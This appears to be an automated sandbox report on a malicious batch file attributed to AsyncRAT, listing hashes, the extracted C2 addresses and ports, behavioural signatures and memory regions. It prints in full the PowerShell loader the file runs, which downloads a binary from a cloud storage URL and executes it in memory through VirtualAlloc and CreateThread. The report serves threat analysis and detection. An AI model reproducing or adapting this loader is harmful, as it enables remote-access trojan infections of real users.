Analysis

  • max time kernel
    20s
  • max time network
    23s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    14-07-2024 06:34

General

  • Target

    black.bat

  • Size

    7KB

  • MD5

    1527117f206e85215dc0b306ff303997

  • SHA1

    058297bbc06690c0fc1614a27dccab912acbfd01

  • SHA256

    8ea56b9b4f79485aedb615161ba64c55950a6970f21dc0f2a7691dd66de91cd2

  • SHA512

    490de266e4516bee0cc6075ec693cbe53c629a1f9740df94951b780745ea67b452b96b6d4e413d9a144e2f853da4cbd0bfab86638440daf8cc7ac9a1269c4e4f

  • SSDEEP

    192:9y/GNQigY2Nw9GKNCufevytXrrLe57YKRZ280QDdc28eNMqMzDWZ:9EGNrJzsKUufKytXr2OKH0Mi28eNMqM2

Score
10/10

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

10.14.0.3:6606

10.14.0.3:7707

10.14.0.3:8808

Mutex

SoDs5pvJ8zw0

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\black.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1572
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e $ P r o g r e s s P r e f e r e n c e   =   ' S i l e n t l y C o n t i n u e ' 
 f u n c t i o n   L o o k u p F u n c   { 
         P a r a m   ( $ m o d u l e N a m e ,   $ f u n c t i o n N a m e ) 
         $ a s s e m   =   ( [ A p p D o m a i n ] : : C u r r e n t D o m a i n . G e t A s s e m b l i e s ( )   |   W h e r e - O b j e c t   {   $ _ . G l o b a l A s s e m b l y C a c h e   - A n d   $ _ . L o c a t i o n . S p l i t ( ' \ \ ' ) [ - 1 ] . E q u a l s ( ' S y s t e m . d l l ' ) } ) . G e t T y p e ( ' M i c r o s o f t . W i n 3 2 . U n s a f e N a t i v e M e t h o d s ' ) 
         $ t m p   =   $ a s s e m . G e t M e t h o d s ( )   |   F o r E a c h - O b j e c t   { I f ( $ _ . N a m e   - e q   " G e t P r o c A d d r e s s " )   { $ _ } }   
         $ h a n d l e   =   $ a s s e m . G e t M e t h o d ( ' G e t M o d u l e H a n d l e ' ) . I n v o k e ( $ n u l l ,   @ ( $ m o d u l e N a m e ) ) ; 
         [ I n t P t r ]   $ r e s u l t   =   0 ; 
         t r y   { 
                 W r i t e - H o s t   " F i r s t   I n v o k e   -   $ m o d u l e N a m e   $ f u n c t i o n N a m e " ; 
                 $ r e s u l t   =   $ t m p [ 0 ] . I n v o k e ( $ n u l l ,   @ ( $ h a n d l e ,   $ f u n c t i o n N a m e ) ) ; 
         } c a t c h   { 
                 W r i t e - H o s t   " S e c o n d   I n v o k e   -   $ m o d u l e N a m e   $ f u n c t i o n N a m e " ; 
                 $ h a n d l e   =   n e w - o b j e c t   - T y p e N a m e   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . H a n d l e R e f   - A r g u m e n t L i s t   @ ( $ n u l l ,   $ h a n d l e ) ; 
                 $ r e s u l t   =   $ t m p [ 0 ] . I n v o k e ( $ n u l l ,   @ ( $ h a n d l e ,   $ f u n c t i o n N a m e ) ) ; 
         } 
         r e t u r n   $ r e s u l t ; 
 } 
 f u n c t i o n   g e t D e l e g a t e T y p e   { 
         P a r a m   ( [ P a r a m e t e r ( P o s i t i o n   =   0 ,   M a n d a t o r y   =   $ T r u e ) ]   [ T y p e [ ] ]   $ f u n c , [ P a r a m e t e r ( P o s i t i o n   =   1 ) ]   [ T y p e ]   $ d e l T y p e   =   [ V o i d ] ) 
         $ t y p e   =   [ A p p D o m a i n ] : : C u r r e n t D o m a i n . D e f i n e D y n a m i c A s s e m b l y ( ( N e w - O b j e c t   S y s t e m . R e f l e c t i o n . A s s e m b l y N a m e ( ' R e f l e c t e d D e l e g a t e ' ) ) ,   [ S y s t e m . R e f l e c t i o n . E m i t . A s s e m b l y B u i l d e r A c c e s s ] : : R u n ) . D e f i n e D y n a m i c M o d u l e ( ' I n M e m o r y M o d u l e ' ,   $ f a l s e ) . D e f i n e T y p e ( ' M y D e l e g a t e T y p e ' , ' C l a s s ,   P u b l i c ,   S e a l e d ,   A n s i C l a s s ,   A u t o C l a s s ' ,   [ S y s t e m . M u l t i c a s t D e l e g a t e ] ) 
         $ t y p e . D e f i n e C o n s t r u c t o r ( ' R T S p e c i a l N a m e ,   H i d e B y S i g ,   P u b l i c ' , [ S y s t e m . R e f l e c t i o n . C a l l i n g C o n v e n t i o n s ] : : S t a n d a r d ,   $ f u n c ) . S e t I m p l e m e n t a t i o n F l a g s ( ' R u n t i m e ,   M a n a g e d ' ) 
         $ t y p e . D e f i n e M e t h o d ( ' I n v o k e ' ,   ' P u b l i c ,   H i d e B y S i g ,   N e w S l o t ,   V i r t u a l ' ,   $ d e l T y p e ,   $ f u n c ) . S e t I m p l e m e n t a t i o n F l a g s ( ' R u n t i m e ,   M a n a g e d ' ) 
         r e t u r n   $ t y p e . C r e a t e T y p e ( )   
 } 
 
 [ B y t e [ ] ]   $ b u f   =   ( i W r   - U s E b   " h t t p s : / / u p n o w - p r o d . f f 4 5 e 4 0 d 1 a 1 c 8 f 7 e 7 d e 4 e 9 7 6 d 0 c 9 e 5 5 5 . r 2 . c l o u d f l a r e s t o r a g e . c o m / B J k v b F o j W P U Q a u D K 6 1 B s 1 H 7 m P v G 3 / a 9 c b f e 9 1 - 5 e 7 f - 4 7 a 9 - a 0 5 c - 9 e a a c 5 b b 2 e 3 c ? X - A m z - A l g o r i t h m = A W S 4 - H M A C - S H A 2 5 6 & X - A m z - C r e d e n t i a l = c d d 1 2 e 3 5 b b d 2 2 0 3 0 3 9 5 7 d c 5 6 0 3 a 4 c c 8 e % 2 F 2 0 2 4 0 7 1 4 % 2 F a u t o % 2 F s 3 % 2 F a w s 4 _ r e q u e s t & X - A m z - D a t e = 2 0 2 4 0 7 1 4 T 0 6 3 3 5 6 Z & X - A m z - E x p i r e s = 4 3 2 0 0 & X - A m z - S i g n a t u r e = 2 5 4 0 1 3 c 4 e 1 b f 4 7 e 1 c d 8 0 4 3 3 c 8 e d 2 5 4 a 6 4 4 8 6 6 1 c 0 b e 1 c 9 d 5 2 c 3 4 3 b b e 8 8 8 f 8 7 c b 6 & X - A m z - S i g n e d H e a d e r s = h o s t & r e s p o n s e - c o n t e n t - d i s p o s i t i o n = a t t a c h m e n t % 3 B % 2 0 f i l e n a m e % 3 D % 2 2 o u t . b i n % 2 2 " ) . c o n t e n t 
 $ l p M e m   =   [ S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . M a r s h a l ] : : G e t D e l e g a t e F o r F u n c t i o n P o i n t e r ( ( L o o k u p F u n c   k e r n e l 3 2 . d l l   V i r t u a l A l l o c ) , ( g e t D e l e g a t e T y p e   @ ( [ I n t P t r ] ,   [ U I n t 3 2 ] ,   [ U I n t 3 2 ] ,   [ U I n t 3 2 ] ) ( [ I n t P t r ] ) ) ) . I n v o k e ( [ I n t P t r ] : : Z e r o ,   $ b u f . l e n g t h ,   0 x 3 0 0 0 ,   0 x 4 0 ) 
 [ S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . M a r s h a l ] : : C o p y ( $ b u f ,   0 ,   $ l p M e m ,   $ b u f . l e n g t h ) 
 $ h T h r e a d   =   [ S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . M a r s h a l ] : : G e t D e l e g a t e F o r F u n c t i o n P o i n t e r ( ( L o o k u p F u n c   k e r n e l 3 2 . d l l   C r e a t e T h r e a d ) , ( g e t D e l e g a t e T y p e   @ ( [ I n t P t r ] ,   [ U I n t 3 2 ] ,   [ I n t P t r ] ,   [ I n t P t r ] , [ U I n t 3 2 ] ,   [ I n t P t r ] ) ( [ I n t P t r ] ) ) ) . I n v o k e ( [ I n t P t r ] : : Z e r o , 0 , $ l p M e m , [ I n t P t r ] : : Z e r o , 0 , [ I n t P t r ] : : Z e r o ) 
 [ S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . M a r s h a l ] : : G e t D e l e g a t e F o r F u n c t i o n P o i n t e r ( ( L o o k u p F u n c   k e r n e l 3 2 . d l l   W a i t F o r S i n g l e O b j e c t ) , ( g e t D e l e g a t e T y p e   @ ( [ I n t P t r ] ,   [ I n t 3 2 ] ) ( [ I n t ] ) ) ) . I n v o k e ( $ h T h r e a d ,   0 x F F F F F F F F ) 
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3108
      • C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe
        "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe"
        3⤵
          PID:1556

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dvpiyjnu.smt.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1556-22-0x0000022742CA0000-0x0000022742CB3000-memory.dmp

      Filesize

      76KB

    • memory/1556-26-0x00007FF9C7490000-0x00007FF9C7F52000-memory.dmp

      Filesize

      10.8MB

    • memory/1556-24-0x0000022742D60000-0x0000022742D72000-memory.dmp

      Filesize

      72KB

    • memory/1556-23-0x00007FF9C7493000-0x00007FF9C7495000-memory.dmp

      Filesize

      8KB

    • memory/3108-11-0x00007FF9C7490000-0x00007FF9C7F52000-memory.dmp

      Filesize

      10.8MB

    • memory/3108-13-0x0000018F723F0000-0x0000018F72442000-memory.dmp

      Filesize

      328KB

    • memory/3108-14-0x00007FF9C7490000-0x00007FF9C7F52000-memory.dmp

      Filesize

      10.8MB

    • memory/3108-15-0x00007FF9C7490000-0x00007FF9C7F52000-memory.dmp

      Filesize

      10.8MB

    • memory/3108-12-0x00007FF9C7490000-0x00007FF9C7F52000-memory.dmp

      Filesize

      10.8MB

    • memory/3108-20-0x00007FF9C7493000-0x00007FF9C7495000-memory.dmp

      Filesize

      8KB

    • memory/3108-0-0x00007FF9C7493000-0x00007FF9C7495000-memory.dmp

      Filesize

      8KB

    • memory/3108-2-0x0000018F71EC0000-0x0000018F71EE2000-memory.dmp

      Filesize

      136KB

    • memory/3108-25-0x00007FF9C7490000-0x00007FF9C7F52000-memory.dmp

      Filesize

      10.8MB

    • memory/3108-1-0x00007FF9C7490000-0x00007FF9C7F52000-memory.dmp

      Filesize

      10.8MB

    • memory/3108-27-0x0000018F723F0000-0x0000018F72442000-memory.dmp

      Filesize

      328KB

    • memory/3108-28-0x00007FF9C7490000-0x00007FF9C7F52000-memory.dmp

      Filesize

      10.8MB